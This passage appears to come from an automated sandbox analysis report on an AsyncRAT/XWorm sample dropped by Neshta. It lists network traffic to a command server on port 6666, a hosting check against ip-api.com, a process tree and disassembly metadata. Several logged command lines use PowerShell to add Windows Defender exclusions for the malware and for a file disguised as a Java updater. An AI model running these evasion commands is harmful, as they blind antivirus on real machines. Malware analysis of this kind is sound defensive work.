                                      Jul 2, 2024 06:53:44.909511089 CEST497126666192.168.2.745.141.26.232
                                      Jul 2, 2024 06:53:44.923976898 CEST497126666192.168.2.745.141.26.232
                                      Jul 2, 2024 06:53:44.929363012 CEST66664971245.141.26.232192.168.2.7
                                      Jul 2, 2024 06:53:47.126477957 CEST66664971245.141.26.232192.168.2.7
                                      Jul 2, 2024 06:53:47.126633883 CEST497126666192.168.2.745.141.26.232
                                      Jul 2, 2024 06:53:48.747612953 CEST497136666192.168.2.745.141.26.232
                                      Jul 2, 2024 06:53:48.747613907 CEST497126666192.168.2.745.141.26.232
                                      Jul 2, 2024 06:53:48.752440929 CEST66664971245.141.26.232192.168.2.7
                                      Jul 2, 2024 06:53:48.752451897 CEST66664971345.141.26.232192.168.2.7
                                      Jul 2, 2024 06:53:48.752531052 CEST497136666192.168.2.745.141.26.232
                                      Jul 2, 2024 06:53:48.766283989 CEST497136666192.168.2.745.141.26.232
                                      Jul 2, 2024 06:53:48.771389961 CEST66664971345.141.26.232192.168.2.7
                                      Jul 2, 2024 06:53:50.991977930 CEST66664971345.141.26.232192.168.2.7
                                      Jul 2, 2024 06:53:50.992072105 CEST497136666192.168.2.745.141.26.232
                                      Jul 2, 2024 06:53:52.262334108 CEST497136666192.168.2.745.141.26.232
                                      Jul 2, 2024 06:53:52.264245987 CEST497146666192.168.2.745.141.26.232
                                      Jul 2, 2024 06:53:52.267189980 CEST66664971345.141.26.232192.168.2.7
                                      Jul 2, 2024 06:53:52.269148111 CEST66664971445.141.26.232192.168.2.7
                                      Jul 2, 2024 06:53:52.269234896 CEST497146666192.168.2.745.141.26.232
                                      Jul 2, 2024 06:53:52.293417931 CEST497146666192.168.2.745.141.26.232
                                      Jul 2, 2024 06:53:52.298433065 CEST66664971445.141.26.232192.168.2.7
                                      Jul 2, 2024 06:53:54.442775965 CEST66664971445.141.26.232192.168.2.7
                                      Jul 2, 2024 06:53:54.442857027 CEST497146666192.168.2.745.141.26.232
                                      Jul 2, 2024 06:53:55.153315067 CEST497146666192.168.2.745.141.26.232
                                      Jul 2, 2024 06:53:55.154129982 CEST497156666192.168.2.745.141.26.232
                                      Jul 2, 2024 06:53:55.158092976 CEST66664971445.141.26.232192.168.2.7
                                      Jul 2, 2024 06:53:55.158885956 CEST66664971545.141.26.232192.168.2.7
                                      Jul 2, 2024 06:53:55.158971071 CEST497156666192.168.2.745.141.26.232
                                      Jul 2, 2024 06:53:55.173754930 CEST497156666192.168.2.745.141.26.232
                                      Jul 2, 2024 06:53:55.178596973 CEST66664971545.141.26.232192.168.2.7
                                      Jul 2, 2024 06:53:57.313405991 CEST66664971545.141.26.232192.168.2.7
                                      Jul 2, 2024 06:53:57.313839912 CEST497156666192.168.2.745.141.26.232
                                      Jul 2, 2024 06:53:57.481360912 CEST497156666192.168.2.745.141.26.232
                                      Jul 2, 2024 06:53:57.482135057 CEST497166666192.168.2.745.141.26.232
                                      Jul 2, 2024 06:53:57.486170053 CEST66664971545.141.26.232192.168.2.7
                                      Jul 2, 2024 06:53:57.486906052 CEST66664971645.141.26.232192.168.2.7
                                      Jul 2, 2024 06:53:57.486988068 CEST497166666192.168.2.745.141.26.232
                                      Jul 2, 2024 06:53:57.501473904 CEST497166666192.168.2.745.141.26.232
                                      Jul 2, 2024 06:53:57.506270885 CEST66664971645.141.26.232192.168.2.7
                                      Jul 2, 2024 06:53:59.709695101 CEST66664971645.141.26.232192.168.2.7
                                      Jul 2, 2024 06:53:59.709899902 CEST497166666192.168.2.745.141.26.232
                                      Jul 2, 2024 06:54:00.205476999 CEST497166666192.168.2.745.141.26.232
                                      Jul 2, 2024 06:54:00.207221031 CEST497176666192.168.2.745.141.26.232
                                      Jul 2, 2024 06:54:00.210448980 CEST66664971645.141.26.232192.168.2.7
                                      Jul 2, 2024 06:54:00.212050915 CEST66664971745.141.26.232192.168.2.7
                                      Jul 2, 2024 06:54:00.212240934 CEST497176666192.168.2.745.141.26.232
                                      Jul 2, 2024 06:54:00.232928038 CEST497176666192.168.2.745.141.26.232
                                      Jul 2, 2024 06:54:00.237854004 CEST66664971745.141.26.232192.168.2.7
                                      Jul 2, 2024 06:54:02.379858971 CEST66664971745.141.26.232192.168.2.7
                                      Jul 2, 2024 06:54:02.379961967 CEST497176666192.168.2.745.141.26.232

                                      UDP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Jul 2, 2024 06:52:01.910375118 CEST6494853192.168.2.71.1.1.1
                                      Jul 2, 2024 06:52:01.917416096 CEST53649481.1.1.1192.168.2.7

                                      DNS Queries

                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                      Jul 2, 2024 06:52:01.910375118 CEST192.168.2.71.1.1.10x61d8Standard query (0)ip-api.comA (IP address)IN (0x0001)false

                                      DNS Answers

                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                      Jul 2, 2024 06:52:01.917416096 CEST1.1.1.1192.168.2.70x61d8No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false

                                      HTTP Request Dependency Graph

                                      • ip-api.com

                                      HTTP Packets

                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      0192.168.2.749699208.95.112.1805336C:\Users\user\AppData\Local\Temp\3582-490\x.exe
                                      TimestampBytes transferredDirectionData
                                      Jul 2, 2024 06:52:01.932157040 CEST80OUTGET /line/?fields=hosting HTTP/1.1
                                      Host: ip-api.com
                                      Connection: Keep-Alive
                                      Jul 2, 2024 06:52:02.407448053 CEST175INHTTP/1.1 200 OK
                                      Date: Tue, 02 Jul 2024 04:52:01 GMT
                                      Content-Type: text/plain; charset=utf-8
                                      Content-Length: 6
                                      Access-Control-Allow-Origin: *
                                      X-Ttl: 16
                                      X-Rl: 42
                                      Data Raw: 66 61 6c 73 65 0a
                                      Data Ascii: false


                                      Statistics

                                      CPU Usage

                                      Click to jump to process

                                      Memory Usage

                                      Click to jump to process

                                      High Level Behavior Distribution

                                      Click to dive into process behavior distribution

                                      Behavior

                                      Click to jump to process

                                      System Behavior

                                      General

                                      Target ID:0
                                      Start time:00:51:56
                                      Start date:02/07/2024
                                      Path:C:\Users\user\Desktop\x.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\x.exe"
                                      Imagebase:0x400000
                                      File size:88'064 bytes
                                      MD5 hash:D27E7C560C09EB318C80CAB58BAEA1B2
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: 00000000.00000002.1905892392.0000000000409000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security
                                      Reputation:low
                                      Has exited:true

                                      General

                                      Target ID:2
                                      Start time:00:51:57
                                      Start date:02/07/2024
                                      Path:C:\Users\user\AppData\Local\Temp\3582-490\x.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Users\user~1\AppData\Local\Temp\3582-490\x.exe"
                                      Imagebase:0xdc0000
                                      File size:46'592 bytes
                                      MD5 hash:9F4FFCEB9E7905107492815B7EBFDC13
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000002.00000002.2471076189.00000000030CE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000002.00000002.2471076189.00000000030CE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000002.00000002.2471076189.00000000030CE000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                      • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000002.00000000.1208996439.0000000000DC2000.00000002.00000001.01000000.00000005.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000002.00000000.1208996439.0000000000DC2000.00000002.00000001.01000000.00000005.sdmp, Author: Joe Security
                                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000002.00000000.1208996439.0000000000DC2000.00000002.00000001.01000000.00000005.sdmp, Author: ditekSHen
                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000002.00000002.2471076189.0000000003001000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exe, Author: Joe Security
                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exe, Author: Joe Security
                                      • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exe, Author: Joe Security
                                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exe, Author: ditekSHen
                                      Reputation:low
                                      Has exited:false

                                      General

                                      Target ID:3
                                      Start time:00:52:02
                                      Start date:02/07/2024
                                      Path:C:\Windows\svchost.com
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\3582-490\x.exe'
                                      Imagebase:0x400000
                                      File size:41'472 bytes
                                      MD5 hash:E2758E90753E604AB1857653E10B35EE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true

                                      General

                                      Target ID:4
                                      Start time:00:52:02
                                      Start date:02/07/2024
                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\3582-490\x.exe'
                                      Imagebase:0xc40000
                                      File size:433'152 bytes
                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:5
                                      Start time:00:52:02
                                      Start date:02/07/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff75da10000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:18
                                      Start time:01:56:38
                                      Start date:02/07/2024
                                      Path:C:\Windows\svchost.com
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'x.exe'
                                      Imagebase:0x400000
                                      File size:41'472 bytes
                                      MD5 hash:E2758E90753E604AB1857653E10B35EE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true

                                      General

                                      Target ID:19
                                      Start time:01:56:38
                                      Start date:02/07/2024
                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'x.exe'
                                      Imagebase:0xc40000
                                      File size:433'152 bytes
                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:20
                                      Start time:01:56:38
                                      Start date:02/07/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff75da10000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:21
                                      Start time:01:56:38
                                      Start date:02/07/2024
                                      Path:C:\Windows\svchost.com
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Java Update Checker (64 bit).exe'
                                      Imagebase:0x400000
                                      File size:41'472 bytes
                                      MD5 hash:E2758E90753E604AB1857653E10B35EE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true

                                      General

                                      Target ID:22
                                      Start time:01:56:38
                                      Start date:02/07/2024
                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Java Update Checker (64 bit).exe'
                                      Imagebase:0xc40000
                                      File size:433'152 bytes
                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:23
                                      Start time:01:56:38
                                      Start date:02/07/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff75da10000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:24
                                      Start time:01:56:39
                                      Start date:02/07/2024
                                      Path:C:\Windows\svchost.com
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Java Update Checker (64 bit).exe'
                                      Imagebase:0x400000
                                      File size:41'472 bytes
                                      MD5 hash:E2758E90753E604AB1857653E10B35EE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true

                                      General

                                      Target ID:25
                                      Start time:01:56:39
                                      Start date:02/07/2024
                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Java Update Checker (64 bit).exe'
                                      Imagebase:0xc40000
                                      File size:433'152 bytes
                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:26
                                      Start time:01:56:39
                                      Start date:02/07/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff75da10000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Disassembly

                                      Reset < >

                                        Executed Functions

                                        Function 00007FFAACCA0610 Relevance: 7.0, Strings: 5, Instructions: 761COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2480762249.00007FFAACCA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCA0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID: 0D%$0D%$0D%$8M%$CAP_^
                                        • API String ID: 0-2493495276
                                        • Opcode ID: 7005c7e5964e3a68c83187bf1cfccdc11cd9d702be75965ac1c77b2d295c49a3
                                        • Instruction ID: a4af91a723348aa37e52ff2a18066f18c3aef639daaa94007a6ece40e0900274
                                        • Opcode Fuzzy Hash: 7005c7e5964e3a68c83187bf1cfccdc11cd9d702be75965ac1c77b2d295c49a3
                                        • Instruction Fuzzy Hash: BB320661B2DA498FF798FB3C845D6B977D2FF89754F4045B9E00EC3292DE28A8058781
                                        Function 00007FFAACCA6E61 Relevance: 1.6, APIs: 1, Instructions: 122COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2480762249.00007FFAACCA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCA0000, based on PE: false
                                        Similarity
                                        • API ID: CheckDebuggerPresentRemote
                                        • String ID:
                                        • API String ID: 3662101638-0
                                        • Opcode ID: 84f49885354a7fca958dfe4bc8710df83588c890f773aa7c74dac46fd00cc50f
                                        • Instruction ID: e93e3a1fb7192a22b984857350f39a4949a22213dab3a346cfd41266d6c1f74d
                                        • Opcode Fuzzy Hash: 84f49885354a7fca958dfe4bc8710df83588c890f773aa7c74dac46fd00cc50f
                                        • Instruction Fuzzy Hash: 7F3135719087588FCB58DF68C8497E97BE0FF65321F0542ABD489D7242D734A846CB91
                                        Function 00007FFAACCA58B6 Relevance: .5, Instructions: 472COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2480762249.00007FFAACCA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCA0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b1de90dc2d6b504f1f1353aa668156bf8207a30e2f3c869db5b263adfd0b67ef
                                        • Instruction ID: f41c239a1df9424301a1da0b60f1e0501941046dad74918c31aa0bea738e12ae
                                        • Opcode Fuzzy Hash: b1de90dc2d6b504f1f1353aa668156bf8207a30e2f3c869db5b263adfd0b67ef
                                        • Instruction Fuzzy Hash: EAF1B570919A8D8FEFA8DF28D849BE937E2FF55310F04826AE84DC7291CB34D9458781
                                        Function 00007FFAACCA6662 Relevance: .5, Instructions: 458COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2480762249.00007FFAACCA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCA0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 632420a471095c0ed732133f37b197569c4a11374e1bbd26353acd2fca1c9551
                                        • Instruction ID: 320e99fa0b3c12c79e13c2decc8dd6b02cde58b889cdff58c1f3d4ba7ed0b959
                                        • Opcode Fuzzy Hash: 632420a471095c0ed732133f37b197569c4a11374e1bbd26353acd2fca1c9551
                                        • Instruction Fuzzy Hash: 55E1A270909A4D8FEBA8DF28C8597E977E2EF55710F04826EE84DC7291CF78D8458B81
                                        Function 00007FFAACCA1771 Relevance: .4, Instructions: 392COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2480762249.00007FFAACCA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCA0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ad0d561e7cb734c4759c498682f55578668a6ffa384fa8fc6977262c7b51e8b6
                                        • Instruction ID: d58df38a972c50c62e7839cc589f48185003beb299d7d7cbb3b056d517bf4684
                                        • Opcode Fuzzy Hash: ad0d561e7cb734c4759c498682f55578668a6ffa384fa8fc6977262c7b51e8b6
                                        • Instruction Fuzzy Hash: 7DC1A4A1B1D949CFFB98EB3884597B977D2EF99700F048179D04EC32D2DE28E8468785
                                        Function 00007FFAACCA8A0D Relevance: 1.6, APIs: 1, Instructions: 144COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2480762249.00007FFAACCA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCA0000, based on PE: false
                                        Similarity
                                        • API ID: CriticalProcess
                                        • String ID:
                                        • API String ID: 2695349919-0
                                        • Opcode ID: 0e5dfa920f28baf0eb55694b9ba95b36860b8e264a748ce593e00e5ddb542c62
                                        • Instruction ID: aaaa74c5d4eeaab39e8f9a40b4ecbc95a25ff65e512749ce7a9438abad5cc601
                                        • Opcode Fuzzy Hash: 0e5dfa920f28baf0eb55694b9ba95b36860b8e264a748ce593e00e5ddb542c62
                                        • Instruction Fuzzy Hash: 0041C47190C7498FD718DFA8D849BE9BBF1EF56311F04416EE08AC3692CB74A846CB91
                                        Function 00007FFAACCA8D38 Relevance: 1.6, APIs: 1, Instructions: 137COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2480762249.00007FFAACCA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCA0000, based on PE: false
                                        Similarity
                                        • API ID: HookWindows
                                        • String ID:
                                        • API String ID: 2559412058-0
                                        • Opcode ID: 4c90184065337b5906725ca21c7a4b2c25496aa30095c79e9b8a7816e1f27b10
                                        • Instruction ID: ffceb9a78f656ff8ce7da46f8413d2b1fe091531df149a0b8af52f5f9fb834a6
                                        • Opcode Fuzzy Hash: 4c90184065337b5906725ca21c7a4b2c25496aa30095c79e9b8a7816e1f27b10
                                        • Instruction Fuzzy Hash: 15411A7091CA4D8FEB58DF68D84A6F97BE1EF55321F00427ED00DC3192CB64A81687C1
                                        Function 00007FFAACCA8E54 Relevance: 1.6, APIs: 1, Instructions: 132COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2480762249.00007FFAACCA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCA0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f5c8008c66aae24ffe7a78699a14c3bab2201c1894fcf0535e99acfc42bd439c
                                        • Instruction ID: 8afc827cca23cc6d194c8bc9aea8458fca0a7dc472797a16c4675966f0e63174
                                        • Opcode Fuzzy Hash: f5c8008c66aae24ffe7a78699a14c3bab2201c1894fcf0535e99acfc42bd439c
                                        • Instruction Fuzzy Hash: 0631B531A1CA48CFEF48EF6CD8456E8B7E1FBA9321F04427AD00DD3291CB25A8168781
                                        Function 00007FFAACCA833A Relevance: 1.6, APIs: 1, Instructions: 120COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2480762249.00007FFAACCA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCA0000, based on PE: false
                                        Similarity
                                        • API ID: CriticalProcess
                                        • String ID:
                                        • API String ID: 2695349919-0
                                        • Opcode ID: d6983eb487d2750f277c4e88cdf1fdfcb87a2487135a91727278981fbb881d90
                                        • Instruction ID: 557f57946c152f6c06555f2a4660c300843711da8718a81235b28c1dffbd16e6
                                        • Opcode Fuzzy Hash: d6983eb487d2750f277c4e88cdf1fdfcb87a2487135a91727278981fbb881d90
                                        • Instruction Fuzzy Hash: C531E371908A188FDB28DF5CD849BF9BBE1FF55311F04412EE09AD3681CB70A846CB91

                                        Executed Functions

                                        Function 045DB470 Relevance: .3, Instructions: 266COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1375249695.00000000045D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045D0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 69e8ff332410849aff44f7e2ff5fe7888a4b65ddb40baaeabd03eed224549874
                                        • Instruction ID: b32daedc93e74ea9e91098b0ec8f8ed655ab8090516f7a5b8a799e6aeaca101b
                                        • Opcode Fuzzy Hash: 69e8ff332410849aff44f7e2ff5fe7888a4b65ddb40baaeabd03eed224549874
                                        • Instruction Fuzzy Hash: 7D915E75F016149BEB29DFB984106AF7BA3EF84B00B04891DD516AB344DF34AE068BD6
                                        Function 045DB490 Relevance: .3, Instructions: 252COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1375249695.00000000045D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045D0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d6c840f722bcce93af20a697e85828838903cc27b60fca4ea0fed3e6b2a84558
                                        • Instruction ID: 657041b3ae4e127eaeefee3fe7a71e1864b636eb973b47b7fdf6c74f4481c8a0
                                        • Opcode Fuzzy Hash: d6c840f722bcce93af20a697e85828838903cc27b60fca4ea0fed3e6b2a84558
                                        • Instruction Fuzzy Hash: EB915FB5F006149BEF29EFB9841066F7AE3EF84B00B04891DD516AB344DF74AD068BD6
                                        Function 073E2308 Relevance: 17.8, Strings: 13, Instructions: 1547COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1426686624.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID: $a]l$,Sl$,Sl$Jl$Jl$Jl$Jl$Jl$Jl$Rl$Rl$rl$rl
                                        • API String ID: 0-1354437308
                                        • Opcode ID: 55ff2272504a9efbd1c1ca51aa291133cb2d45a6950ad041371470032b4f6f14
                                        • Instruction ID: 162827ff5789df64f8f80eb12b9bfcc7c6a2c5c753233f6e224d2dcc2f97d2b9
                                        • Opcode Fuzzy Hash: 55ff2272504a9efbd1c1ca51aa291133cb2d45a6950ad041371470032b4f6f14
                                        • Instruction Fuzzy Hash: EDB23BB1B043268FFB259B6988017ABBBFDBF86211F14806BD549CB7D1DA31D841C7A1
                                        Function 0853755B Relevance: 1.6, APIs: 1, Instructions: 51threadCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1458680893.0000000008530000.00000040.00000800.00020000.00000000.sdmp, Offset: 08530000, based on PE: false
                                        Similarity
                                        • API ID: ThreadToken
                                        • String ID:
                                        • API String ID: 3254676861-0
                                        • Opcode ID: 0d902d9f14145e01f63fcea9fa445eed1c5dea8ec0870c02701d14d902d4d5d9
                                        • Instruction ID: 956cc6384ff507c89719c4e7a8575146e1683d4ff2bbf13bb92034232e88bcd1
                                        • Opcode Fuzzy Hash: 0d902d9f14145e01f63fcea9fa445eed1c5dea8ec0870c02701d14d902d4d5d9
                                        • Instruction Fuzzy Hash: FF1143B1D003488FCB20CFAAC844BDEFBF4EB48225F24842AD418A3250CB74A941CFA1
                                        Function 08537560 Relevance: 1.5, APIs: 1, Instructions: 48threadCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1458680893.0000000008530000.00000040.00000800.00020000.00000000.sdmp, Offset: 08530000, based on PE: false
                                        Similarity
                                        • API ID: ThreadToken
                                        • String ID:
                                        • API String ID: 3254676861-0
                                        • Opcode ID: 52c5f314dbc1ffc702dde03e287fb69708ebf1adb62492b68c4eb224ce758b9f
                                        • Instruction ID: a9669d751c45ef17149fdfe20bcb5e7e928413ee32299d10dfc0ff0d54dc6a35
                                        • Opcode Fuzzy Hash: 52c5f314dbc1ffc702dde03e287fb69708ebf1adb62492b68c4eb224ce758b9f
                                        • Instruction Fuzzy Hash: A01125B5D003098FDB20DF9AC844B9EFBF4EB48325F148429D418A3350CB74A945CFA1
                                        Function 073E3CE8 Relevance: .6, Instructions: 582COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1426686624.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 64b0931c91401fd1e8947684f4fdab04adb13561f588e558a1abedf062b9d520
                                        • Instruction ID: 389c425b9b3069fb87ff7a9a4c6ba23c4c9e4aced00de7989e95cf571b999823
                                        • Opcode Fuzzy Hash: 64b0931c91401fd1e8947684f4fdab04adb13561f588e558a1abedf062b9d520
                                        • Instruction Fuzzy Hash: 31125EB1B04365CFEB259B6888117AABBBAAFC5211F24807BD509CB7D1DB31DC41C7A1
                                        Function 045D29F0 Relevance: .2, Instructions: 207COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1375249695.00000000045D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045D0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e826fac94b83f15ab6921dd98cf5c9b7a9f4cf2ddd1c308246e65e809ec7cd2c
                                        • Instruction ID: 9cd71ca9a68eac48a7d6d2be315de2aa2d880ce5c94eb46670479f31ae861fc6
                                        • Opcode Fuzzy Hash: e826fac94b83f15ab6921dd98cf5c9b7a9f4cf2ddd1c308246e65e809ec7cd2c
